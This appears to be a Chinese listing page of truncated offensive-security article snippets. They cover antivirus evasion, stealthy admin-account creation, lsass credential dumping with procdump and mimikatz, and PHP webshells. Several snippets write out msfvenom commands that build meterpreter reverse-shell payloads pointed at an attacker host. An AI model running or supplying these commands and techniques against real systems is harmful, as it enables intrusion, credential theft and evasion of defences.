反病毒解决方案用于检测恶意文件，并且通常使用静态分析技术来区分二进制文件的好坏。如果是恶意文件本身包含恶意内容(ShellCode)，那么依靠静态分析技术会非常有效，但如果攻击者使用轻量级的stager来代替下载并将代码加载到内存中，会发生什么？事实证明这样做可以绕过大多数杀软的查杀。 虽然这种 ...

windows绕过杀软添加账户密码 起因：system权限下存在杀软无法添加账户信息 绕过方法 1、C#脚本 运行后会在目标机器上创建一个用户为 wh4am1 密码为 qqai@love 的 Administrators 组用户 2、Dll劫持 3、copy net1 ...

msfvenom——木马免杀篇 目录 msfvenom——木马免杀篇 c语言执行 生成shellcode.c c语言执行 检查 python语言执行 方法 ...

正常的 ssp 扩展（dll）可以加载到 lsass 进程中去，比如 kerberos 验证都是通过加载 kerberos.dll (它就是一种 ssp)调用 sspi 来进行验证，所以我们就可以控制加载一个我们自己的 dll 执行恶意代码从而 dump hash，但是杀软肯定会对常规 ...

思路： 就是通过系统自带的procdump去下载存储用户名密码的文件（应该不能那么说这个文件，但是这样理解没问题），然后用猕猴桃读取。 procdump.exe Procdum ...

贴上使用笔记 不多介绍了 很简单的东西 msfvenom各平台生成木马大全: windows:msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 ...

转自：https://www.cnblogs.com/-qing-/p/10631414.html 0x03 关于eval 于 assert# 关于eval函数在php给出的官方说明是 e ...

免杀2-msf免杀 1. 生成shellcode msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.227.129 LPORT=4444 -f c 2. 生成python脚本 echo ‘密文 ...